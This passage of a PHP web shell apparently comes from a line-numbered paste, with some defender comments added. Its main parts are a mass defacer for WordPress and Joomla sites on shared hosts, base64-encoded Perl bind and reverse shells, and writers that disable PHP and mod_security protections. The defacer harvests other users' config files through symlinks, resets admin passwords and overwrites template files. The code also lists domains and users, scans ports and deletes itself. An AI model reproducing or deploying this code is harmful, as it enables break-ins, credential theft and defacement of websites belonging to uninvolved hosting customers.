"';");$password = entre2v2($conf, $doler."password = '", "';");$dbname = entre2v2($conf, $doler."db = '", "';");$prefix = entre2v2($conf, $doler."dbprefix = '", "';");$host = entre2v2($conf, $doler."host = '","';");$co=randomt();$site_url = "http://".$domain."/administrator";$output = '';$cond = 0; $link=mysql_connect($host, $username, $password);if($link) {mysql_select_db($dbname,$link) ;$req1 = mysql_query("UPDATE `".$prefix."users` SET `username` ='admin' , `password` = '4297f44b13955235245b2497399d7a93', `usertype` = 'Super Administrator', `block` = 0");$req = mysql_numrows(mysql_query("SHOW TABLES LIKE '".$prefix."extensions'"));} else {$output.= "[-] DB Error<br />";}if($req1){if ($req) {$req = mysql_query("SELECT * from `".$prefix."template_styles` WHERE `client_id` = '0' and `home` = '1'");$data = mysql_fetch_array($req);$template_name = $data["template"];$req = mysql_query("SELECT * from `".$prefix."extensions` WHERE `name`='".$template_name."' or `element` = '".$template_name."'");$data = mysql_fetch_array($req);$template_id = $data["extension_id"];$url2=$site_url."/index.php";$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$return = entre2v2($buffer ,'<input type="hidden" name="return" value="','"');$hidden = entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);if($return && $hidden) {curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_REFERER, $url2);curl_setopt($ch, CURLOPT_POSTFIELDS, "username=admin&passwd=123123&option=com_login&task=login&return=".$return."&".$hidden."=1");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 
0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$pos = strpos($buffer,"com_config");if($pos === false) {$output.= "[-] Login Error<br />";} else {$output.= "[+] Login Successful<br />";}}if($pos){$url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);if($hidden2) {$output.= "[+] index.php file found in Theme Editor<br />";} else {$output.= "[-] index.php Not found in Theme Editor<br />";}}if($hidden2) {$url2=$site_url."/index.php?option=com_templates&layout=edit";$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$content."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);curl_close($ch);$pos = strpos($buffer,'<dd class="message message">');$cond = 0;if($pos === false) {$output.= "[-] Updating Index.php Error<br />";} else {$output.= "[+] Index.php Template successfully saved<br />";$cond = 1;}}} else {$req =mysql_query("SELECT * from `".$prefix."templates_menu` WHERE client_id='0'");$data = mysql_fetch_array($req);$template_name=$data["template"];$useragent="Mozilla/4.0 
(compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";$url2=$site_url."/index.php";$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);if($hidden) {curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456&option=com_login&task=login&".$hidden."=1");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$pos = strpos($buffer,"com_config");if($pos === false) {$output.= "[-] Login Error<br />";} else {$output.= "[+] Login Successful<br />";}}if($pos) {$url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);if($hidden2) {$output.= "[+] index.php file founded in Theme Editor<br />";} else {$output.= "[-] index.php Not found in Theme Editor<br />";}}if($hidden2) {$url2=$site_url."/index.php?option=com_templates&layout=edit";curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, 
CURLOPT_POSTFIELDS,"filecontent=".$content."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co);$buffer = curl_exec($ch);curl_close($ch);$pos = strpos($buffer,'<dd class="message message fade">');$cond = 0;if($pos === false) {$output.= "[-] Updating Index.php Error<br />";} else {$output.= "[+] Index.php Template successfully saved<br />";$cond = 1;}}}} else {$output.= "[-] DB Error<br />";}global $base_path;unlink($base_path.$co);return array('cond'=>$cond, 'output'=>$output); }function exec_mode_1($def_url) {@mkdir('sym',0777);$wr = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";$fp = @fopen ('sym/.htaccess','w');fwrite($fp, $wr);@symlink('/','sym/root');$dominios = @file_get_contents("/etc/named.conf");@preg_match_all('/.*?zone "(.*?)" {/', $dominios, $out);$out[1] = array_unique($out[1]);$numero_dominios = count($out[1]);echo "Total domains: $numero_dominios <br><br />";$def = file_get_contents($def_url);$def = urlencode($def);$dd = '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';$base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/sym/root/home/';$output = fopen('defaced.html', 'a+');$_SESSION['count1'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count1']) ? $_SESSION['count1'] :0 ) : 0;$_SESSION['count2'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count2']) ? 
$_SESSION['count2'] :0 ) : 0;echo '<table style="width:75%;" align="center"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';$j = 1;$st = (isset($_GET['st']) && $_GET['st']!='') ? $_GET['st'] : 0;for($i = $st; $i <= $numero_dominios; $i++){$domain = $out[1][$i];$dono_arquivo = @fileowner("/etc/valiases/".$domain);$infos = @posix_getpwuid($dono_arquivo);if($infos['name']!='root') {$config01 = @file_get_contents($base_url.$infos['name']."/public_html/configuration.php");$config02 = @file_get_contents($base_url.$infos['name']."/public_html/wp-config.php");$config03 = @file_get_contents($base_url.$infos['name']."/public_html/blog/wp-config.php");$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';if($config01 && preg_match('/dbprefix/i',$config01)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="pink">JOOMLA</font></td>';$res = index_changer_joomla($config01, $def, $domain);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$_SESSION['count1'] = $_SESSION['count1'] + 1;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}if($config02 && preg_match('/DB_NAME/i',$config02)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';$res = index_changer_wp($config02, $dd);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$_SESSION['count2'] = $_SESSION['count2'] + 1;} else {echo '<td align="center"><span 
class="red">FAILED</span></td>';}echo '</tr>';}$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';if($config03 && preg_match('/DB_NAME/i',$config03)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';$res = index_changer_wp($config03, $dd);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$_SESSION['count2'] = $_SESSION['count2'] + 1;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}}}echo '</table>';echo '<hr/>';echo 'Total Defaced = '.($_SESSION['count1']+$_SESSION['count2']).' (JOOMLA = '.$_SESSION['count1'].', WORDPRESS = '.$_SESSION['count2'].')<br />';echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';if($_SESSION['count1']+$_SESSION['count2'] > 0){echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';}}function exec_mode_2($def_url) {$domains = @file_get_contents("/etc/named.conf");@preg_match_all('/.*?zone "(.*?)" {/', $domains, $out);$out = array_unique($out[1]);$num = count($out);print("Total domains: $num<br><br />");$def = file_get_contents($def_url);$def = urlencode($def);$output = fopen('defaced.html', 'a+');$defaced = '';$count1 = 0;$count2 = 0;echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';$j = 1;$map = array();foreach($out as $d) {$info = @posix_getpwuid(fileowner("/etc/valiases/".$d));$map[$info['name']] = $d;}$dt = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiAgICAkbXNyID0gcXh7cHdkfTs
  459. NCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2
  460. h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19od
  461. G1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwv
  462. YmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRklMRSwgJy9ldGMvcGFzc3d
  463. kJyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPCR5OyRrYSsrKXsNCiAgIC
  464. B3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';mkdir('plsym',0777);file_put_contents('plsym/plsym.cc', base64_decode($dt));chmod('plsym/plsym.cc', 0755);$wr = "Options FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc";$fp = @fopen ('plsym/.htaccess','w');fwrite($fp, $wr);fclose($fp);$res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc'); $url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';unlink('plsym/plsym.cc');$data = file_get_contents($url);preg_match_all('/<a href="(.+)">/', $data, $match);unset($match[1][0]);$i = 1;foreach($match[1] as $m){$mz = explode('##',urldecode($m));$config01 = '';$config02 = '';if($mz[1] == 'joomla.txt') {$config01 = file_get_contents($url.$m);}if($mz[1] == 'wordpress.txt') {$config02 = file_get_contents($url.$m);}$domain = $map[$mz[0]];$cls = ($j % 2 == 0) ? 
'class="even"' : 'class="odd"';if($config01 && preg_match('/dbprefix/i',$config01)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i++.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="pink">JOOMLA</font></td>';$res = index_changer_joomla($config01, $def, $domain);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$count1++;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}if($config02 && preg_match('/DB_NAME/i',$config02)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';$res = index_changer_wp($config02, $def);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$count2++;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}}echo '</table>';echo '<hr/>';echo 'Total Defaced = '.($count1+$count2).' 
(JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';if($count1+$count2 > 0){echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';}}function exec_mode_3($def_url) {$domains = @file_get_contents("/etc/named.conf");@preg_match_all('/.*?zone "(.*?)" {/', $domains, $out);$out = array_unique($out[1]);$num = count($out);print("Total domains: $num<br><br />");$def = file_get_contents($def_url);$def = urlencode($def); $output = fopen('defaced.html', 'a+');$defaced = '';$count1 = 0;$count2 = 0;echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';$j = 1;$map = array();foreach($out as $d) {$info = @posix_getpwuid(fileowner("/etc/valiases/".$d));$map[$info['name']] = $d;}$dt = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiAgICAkbXNyID0gcXh7cHd
  465. kfTsNCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcH
  466. VibGljX2h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL
  467. 3B1YmxpY19odG1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicv
  468. cHVibGljX2h0bWwvYmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRkl
  469. MRSwgJ2RhdGEudHh0Jyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPC
  470. R5OyRrYSsrKXsNCiAgICB3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';mkdir('plsym',0777);file_put_contents('plsym/data.txt', $_POST['man_data']);file_put_contents('plsym/plsym.cc', base64_decode($dt));chmod('plsym/plsym.cc', 0755);$wr = "Options FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc";$fp = @fopen ('plsym/.htaccess','w');fwrite($fp, $wr);fclose($fp);$res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc'); $url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';unlink('plsym/plsym.cc');$data = file_get_contents($url);preg_match_all('/<a href="(.+)">/', $data, $match);unset($match[1][0]);$i=1;foreach($match[1] as $m){$mz = explode('##',urldecode($m));$config01 = '';$config02 = '';if($mz[1] == 'joomla.txt') {$config01 = file_get_contents($url.$m);}if($mz[1] == 'wordpress.txt') {$config02 = file_get_contents($url.$m);}$domain = $map[$mz[0]];$cls = ($j % 2 == 0) ? 
'class="even"' : 'class="odd"';if($config01 && preg_match('/dbprefix/i',$config01)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.($i++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="pink">JOOMLA</font></td>';$res = index_changer_joomla($config01, $def, $domain);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$count1++;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}if($config02 && preg_match('/DB_NAME/i',$config02)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';$res = index_changer_wp($config02, $def);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$count2++;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}}echo '</table>';echo '<hr/>';echo 'Total Defaced = '.($count1+$count2).' 
(JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';if($count1+$count2 > 0){echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';}}echo '<!DOCTYPE html><html><head><link href="http://fonts.googleapis.com/css?family=Orbitron:700" rel="stylesheet" type="text/css"><style type="text/css">.header {position:fixed;width:100%;top:0;background:#000;}.footer {position:fixed;width:100%;bottom:0;background:#000;}input[type="radio"]{margin-top: 0;}.td2 {border-left:1px solid red;border-radius: 2px 2px 2px 2px;}.even {background-color: rgba(25, 25, 25, 0.6);}.odd {background-color: rgba(102, 102, 102, 0.6);}textarea{background: rgba(0,0,0,0.6); color: white;}.green {color:#00FF00;font-weight:bold;}.red {color:#FF0000;font-weight:bold;}</style><script type="text/javascript">function change() {if(document.getElementById(\'rcd\').checked == true) {document.getElementById(\'tra\').style.display = \'\';} else {document.getElementById(\'tra\').style.display = \'none\';}}function hide() {document.getElementById(\'tra\').style.display = \'none\';}</script></head><body><h2 style="font-size:25px;color:#00ff00;text-align: center;font-family:orbitron;text-shadow: 6px 6px 6px black;">Wordpress and Joomla Mass Defacer</h2>';if(!isset($_POST['form_action']) && !isset($_GET['mode'])){echo '<form action="" method="post"><table align=center><tr><td><input type="radio" value="1" name="mode" checked="checked" onclick="hide();"></td><td>using /etc/named.conf ('.(is_readable('/etc/named.conf')?'<span class="green">READABLE</span>':'<span class="red">NOT READABLE</span>').')</td></tr><tr><td><input type="radio" value="2" name="mode" onclick="hide();"></td><td>using /etc/passwd ('.(is_readable('/etc/passwd')?'<span class="green">READABLE</span>':'<span class="red">NOT READABLE</span>').')</td></tr><tr><td><input type="radio" value="2" name="mode" id="rcd" 
onclick="change();"></td><td>manual copy of /etc/passwd</td></tr><tr id="tra" style="display: none;"><td></td><td><textarea cols="60" rows="10" name="man_data"></textarea></td></tr></table><br><input type="hidden" name="form_action" value="1"><table align=center><tr><td><b>index url: </b><input class="inputz" size="45" type="text" name="defpage" value=""></tr></td></table><center><input class="inputzbut" type="submit" value="Attack !" name="Submit"></center></form>';}$milaf_el_index = $_POST['defpage'];if($_POST['form_action'] == 1) {if($_POST['mode']==1) { exec_mode_1($milaf_el_index); }if($_POST['mode']==2) { exec_mode_2($milaf_el_index); }if($_POST['mode']==3) { exec_mode_3($milaf_el_index); }}if($_GET['mode']==1) { exec_mode_1($milaf_el_index); }echo '</body></html>';
  471. }
  472. } elseif($_GET['do'] == 'bypass'){
  // Defender note: this branch writes configuration overrides next to the script.
  // Both handlers use relative paths and fopen mode "w", so an existing php.ini or
  // .htaccess in the working directory is overwritten; fwrite()'s byte count is echoed.
  473. echo "<center>";
  474. echo "<form method=post><input type=submit name=ini value='php.ini' />&nbsp;<input type=submit name=htce value='.htaccess' /></form>";
  // 'ini' button: writes a php.ini containing disable_functions=none and safe_mode = Off.
  // Detection: a php.ini inside a web-served directory carrying these two settings.
  // NOTE(review): whether a per-directory php.ini is honoured depends on the SAPI and host
  // configuration, which this code does not show.
  475. if(isset($_POST['ini']))
  476. {
  477. $file = fopen("php.ini","w");
  478. echo fwrite($file,"disable_functions=none
  479. safe_mode = Off
  480. ");
  481. fclose($file);
  482. echo "<a href='php.ini'>click here!</a>";
  483. } if(isset($_POST['htce']))
  484. {
  // 'htce' button: writes an <IfModule mod_security.c> block that sets SecFilterEngine and
  // SecFilterScanPOST to Off.
  // Detection: .htaccess files containing SecFilterEngine / SecFilterScanPOST, or an .htaccess
  // whose previous contents vanished.
  // NOTE(review): these look like ModSecurity 1.x directive names; confirm against the deployed
  // WAF version and AllowOverride policy whether they have any effect.
  485. $file = fopen(".htaccess","w");
  486. echo fwrite($file,"<IfModule mod_security.c>
  487. SecFilterEngine Off
  488. SecFilterScanPOST Off
  489. </IfModule>
  490. ");
  491. fclose($file);
  492. echo "htaccess successfully created!";
  493. }
  494. echo"</center>";
  495. } elseif($_GET['do'] == 'backconnect') {
  496. echo "<form method='post'>
  497. <u>Bind Port:</u> <br>
  498. PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
  499. <input type='submit' name='sub_bp' value='>>'>
  500. </form>
  501. <form method='post'>
  502. <u>Back Connect:</u> <br>
  503. Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
  504. PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
  505. <input type='submit' name='sub_bc' value='>>'>
  506. </form>";
  507. $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
  // Defender note: 'sub_bp' handler. Base64-decodes $bind_port_p into /tmp/bp.pl, launches it
  // with perl in the background, waits one second, prints a process listing filtered on
  // "bp.pl", then deletes the script file.
  // exe() is defined outside the visible code; presumably it runs a shell command - confirm.
  // Detection: a perl process owned by the web-server account whose script path /tmp/bp.pl
  // no longer exists on disk, short-lived *.pl files in /tmp, and a new listening socket
  // owned by that account (the form labels this feature "Bind Port").
  // Mitigation: deny process-execution functions to PHP and filter inbound/outbound traffic
  // for the web-server account.
  508. if(isset($_POST['sub_bp'])) {
  509. $f_bp = fopen("/tmp/bp.pl", "w");
  510. fwrite($f_bp, base64_decode($bind_port_p));
  511. fclose($f_bp);
  512.  
  // The POSTed value is interpolated into the command line without validation or escaping.
  513. $port = $_POST['port_bind'];
  514. $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
  515. sleep(1);
  516. echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
  // The file is removed right after launch, so file-based scanning alone will not find it.
  517. unlink("/tmp/bp.pl");
  518. }
  519. $back_connect_p="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";
  520. if(isset($_POST['sub_bc'])) {
  521. $f_bc = fopen("/tmp/bc.pl", "w");
  522. fwrite($f_bc, base64_decode($bind_connect_p));
  523. fclose($f_bc);
  524.  
  525. $ipbc = $_POST['ip_bc'];
  526. $port = $_POST['port_bc'];
  527. $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
  528. sleep(1);
  529. echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
  530. unlink("/tmp/bc.pl");
  531. }
  532. } elseif($_GET['do'] == 'kill') {
  // Defender note: self-removal. Deletes the script's own file and terminates with a message.
  // The preg_replace strips a trailing "(digits) ..." suffix from __FILE__ - presumably the
  // form __FILE__ takes inside eval()'d code; confirm.
  // Forensics: after this runs the script is gone from disk; what remains is the request
  // carrying do=kill in access logs plus any files the other branches dropped.
  533. if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
  534. die('<center><br><center><h2>Shell removed</h2><br>Goodbye , Thanks for take my shell today</center></center>');
  535. else
  536. echo '<center>unlink failed!</center>';
  537. } elseif($_GET['do'] == 'domains'){echo "<center><div class='mybox'><p align='center' class='cgx2'>Domains and Users</p>";$d0mains = @file("/etc/named.conf");if(!$d0mains){die("<center>Error : can't read [ /etc/named.conf ]</center>");}echo '<table id="output"><tr bgcolor=#cecece><td>Domains</td><td>users</td></tr>';foreach($d0mains as $d0main){if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);flush();if(strlen(trim($domains[1][0])) > 2){$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));echo "<tr><td><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td><td>".$user['name']."</td></tr>";flush();}}}echo'</div></center>';
  538. }elseif($_GET['do'] == 'ports') {
  // Defender note: TCP connect scan issued from the web server itself.
  // When host/start/end are POSTed (start and end must pass is_numeric), every port in the
  // range is probed with fsockopen() using a 3-second timeout and open ports are printed.
  // Otherwise the input form is rendered with defaults localhost / 0 / 5000.
  539. echo '<table><tr><th><center><u>Port Scanner</u></tr></th></center><td>';
  540. echo '<div class="content">';
  541. echo '<form action="" method="post">';
  542.  
